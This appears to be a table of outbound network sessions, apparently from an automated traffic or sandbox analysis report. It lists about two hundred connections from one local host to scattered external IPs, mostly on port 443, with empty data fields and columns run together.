                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14031192.168.2.1460128183.57.107.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14032192.168.2.1445888163.21.20.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14033192.168.2.1440548131.183.53.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14034192.168.2.1455884165.154.207.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14035192.168.2.1456202176.223.226.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14036192.168.2.1435918102.92.209.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14037192.168.2.1456014185.176.245.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14038192.168.2.1447904217.224.127.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14039192.168.2.1446972135.159.158.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14040192.168.2.1438452134.20.64.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14041192.168.2.1443990133.102.216.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14042192.168.2.145049098.24.148.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14043192.168.2.145885896.69.242.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14044192.168.2.1449630168.179.38.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14045192.168.2.144776297.250.181.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14046192.168.2.14452229.105.137.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14047192.168.2.145017496.86.200.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14048192.168.2.1458370175.224.151.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14049192.168.2.145148243.219.181.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14050192.168.2.145024027.27.7.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14051192.168.2.145686887.67.68.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14052192.168.2.1434458204.139.149.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14053192.168.2.1449926115.19.64.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14054192.168.2.145841094.227.211.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14055192.168.2.1459200171.207.3.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14056192.168.2.143505475.218.20.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14057192.168.2.1448556211.40.192.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14058192.168.2.1442938222.38.27.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14059192.168.2.1456936138.2.97.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14060192.168.2.145623038.123.4.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14061192.168.2.145517483.142.19.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14062192.168.2.144343069.133.85.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14063192.168.2.1437876210.111.25.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14064192.168.2.1456782162.42.13.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14065192.168.2.1444116154.105.68.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14066192.168.2.1457374188.37.25.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14067192.168.2.1434944223.169.40.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14068192.168.2.143840676.130.235.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14069192.168.2.144107835.6.185.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14070192.168.2.1443698132.45.73.64443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14071192.168.2.1440596187.217.240.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14072192.168.2.1460478152.60.139.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14073192.168.2.1441612180.149.252.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14074192.168.2.1450050141.34.74.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14075192.168.2.1459776199.244.138.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14076192.168.2.1448676136.72.120.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14077192.168.2.1456470209.170.210.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14078192.168.2.143281292.48.204.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14079192.168.2.144701874.90.55.99443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14080192.168.2.1460854195.107.243.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14081192.168.2.143372278.116.167.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14082192.168.2.1455436211.36.133.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14083192.168.2.1456078170.6.180.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14084192.168.2.1441374118.156.202.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14085192.168.2.144237273.225.216.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14086192.168.2.1448260136.45.133.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14087192.168.2.1434346212.159.221.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14088192.168.2.144818088.181.202.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14089192.168.2.143854041.90.63.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14090192.168.2.145312462.51.224.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14091192.168.2.1455858106.210.203.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14092192.168.2.1454576124.82.232.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14093192.168.2.1434338219.24.20.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14094192.168.2.145251471.78.146.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14095192.168.2.1456862102.182.95.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14096192.168.2.1433954182.250.167.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14097192.168.2.1450958200.63.148.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14098192.168.2.145475018.46.110.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14099192.168.2.145079235.4.36.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14100192.168.2.1433550133.11.59.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14101192.168.2.144869832.159.220.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14102192.168.2.144218451.108.63.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14103192.168.2.1437340168.87.181.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14104192.168.2.1443750153.177.69.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14105192.168.2.1450832223.187.173.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14106192.168.2.1451948153.5.62.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14107192.168.2.1456002188.226.3.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14108192.168.2.1453540207.126.16.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14109192.168.2.144806040.171.235.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14110192.168.2.1444762159.46.152.26443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14111192.168.2.1439498132.145.153.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14112192.168.2.143570272.184.127.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14113192.168.2.1454434136.218.202.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14114192.168.2.144456498.67.161.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14115192.168.2.1458040137.14.28.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14116192.168.2.146053673.190.225.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14117192.168.2.1455578177.118.45.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14118192.168.2.1441242170.216.41.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14119192.168.2.1437952218.228.83.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14120192.168.2.1438052171.194.146.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14121192.168.2.1459682174.151.64.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14122192.168.2.144454648.250.97.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14123192.168.2.146048253.74.209.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14124192.168.2.1446916183.229.240.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14125192.168.2.1452178170.132.143.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14126192.168.2.1455450112.0.161.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14127192.168.2.144501020.39.129.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14128192.168.2.1445854197.52.205.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14129192.168.2.143772640.141.7.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14130192.168.2.1434784106.41.112.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14131192.168.2.1445096152.205.246.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14132192.168.2.143914651.248.172.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14133192.168.2.1447606106.220.59.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14134192.168.2.1453186153.204.130.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14135192.168.2.1456738175.163.192.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14136192.168.2.1443648123.31.211.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14137192.168.2.1458598168.223.246.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14138192.168.2.1453726208.52.253.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14139192.168.2.1436346190.194.110.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14140192.168.2.143315850.168.196.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14141192.168.2.1441200172.6.176.15443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14142192.168.2.143290491.67.254.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14143192.168.2.1454034105.234.29.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14144192.168.2.1452064162.55.68.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14145192.168.2.144742299.209.194.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14146192.168.2.1458512117.21.223.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14147192.168.2.1454848223.245.243.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14148192.168.2.143585635.48.68.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14149192.168.2.1437100183.41.23.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14150192.168.2.144573886.196.238.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14151192.168.2.144198654.217.205.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14152192.168.2.143916684.142.100.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14153192.168.2.1453612146.213.10.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14154192.168.2.1460414164.0.9.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14155192.168.2.1444466103.10.190.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14156192.168.2.145091024.237.182.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14157192.168.2.1436580141.156.34.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14158192.168.2.1435992161.194.200.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14159192.168.2.144467219.127.87.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14160192.168.2.145591447.107.73.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14161192.168.2.1452430131.202.35.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14162192.168.2.1434120195.44.168.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14163192.168.2.1432878114.124.122.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14164192.168.2.145323638.117.71.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14165192.168.2.14426588.240.58.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14166192.168.2.1446398222.1.159.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14167192.168.2.143334613.204.251.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14168192.168.2.1455748189.211.179.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14169192.168.2.1443398163.164.43.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14170192.168.2.1451862166.18.18.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14171192.168.2.1449762199.76.104.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14172192.168.2.145041098.209.90.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14173192.168.2.143929440.179.157.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14174192.168.2.143682084.28.221.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14175192.168.2.1438294145.59.95.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14176192.168.2.145251813.114.90.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14177192.168.2.1434068108.225.132.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14178192.168.2.145638832.123.246.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14179192.168.2.1441414177.222.51.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14180192.168.2.1453818128.130.52.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14181192.168.2.146028063.37.154.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14182192.168.2.1443204185.202.87.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14183192.168.2.1458482192.210.131.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14184192.168.2.144906458.131.112.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14185192.168.2.143556690.162.230.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14186192.168.2.1441828190.28.185.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14187192.168.2.1460956189.171.232.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14188192.168.2.1434406174.187.175.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14189192.168.2.144237492.136.133.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14190192.168.2.143439494.23.178.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14191192.168.2.145420057.212.54.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14192192.168.2.1451122110.118.235.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14193192.168.2.1459838131.185.120.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14194192.168.2.143535257.155.131.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14195192.168.2.1443062216.107.243.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14196192.168.2.143560214.194.78.221443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14197192.168.2.1435304208.173.194.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14198192.168.2.1457056126.232.82.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14199192.168.2.1460256219.19.141.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14200192.168.2.143573689.155.50.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14201192.168.2.145337448.137.88.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14202192.168.2.1452670148.121.6.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14203192.168.2.1444906193.172.137.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14204192.168.2.1448012211.29.216.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14205192.168.2.1444946121.173.42.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14206192.168.2.1443428105.186.218.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14207192.168.2.144676284.71.78.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14208192.168.2.1456764194.134.167.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14209192.168.2.1445326218.30.129.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14210192.168.2.1442366181.21.246.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14211192.168.2.1438652211.155.41.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14212192.168.2.143945864.77.11.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14213192.168.2.1460664189.24.14.179443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14214192.168.2.1439554108.231.49.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14215192.168.2.1448962147.66.210.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14216192.168.2.1453040189.24.164.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14217192.168.2.1450794173.51.126.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14218192.168.2.144830859.50.125.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14219192.168.2.1434776206.118.111.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14220192.168.2.1447992144.218.183.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14221192.168.2.1447318203.51.161.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14222192.168.2.1443476211.248.233.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14223192.168.2.145927475.176.79.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14224192.168.2.146068824.221.205.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14225192.168.2.1436302179.247.84.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14226192.168.2.145819897.166.74.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14227192.168.2.144764048.124.74.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14228192.168.2.1447906177.201.166.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14229192.168.2.144525467.18.128.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14230192.168.2.1453932219.54.26.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14231192.168.2.1443712138.191.115.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14232192.168.2.1441782130.156.36.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14233192.168.2.1456730220.237.107.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14234192.168.2.1450478116.131.0.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14235192.168.2.1451322191.37.241.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14236192.168.2.1446172191.194.191.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14237192.168.2.144977097.206.202.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14238192.168.2.1450626220.182.105.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14239192.168.2.1450650188.82.176.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14240192.168.2.1442100104.213.206.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14241192.168.2.144660068.213.42.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14242192.168.2.14337544.216.229.53443
                                                        TimestampBytes transferredDirectionData


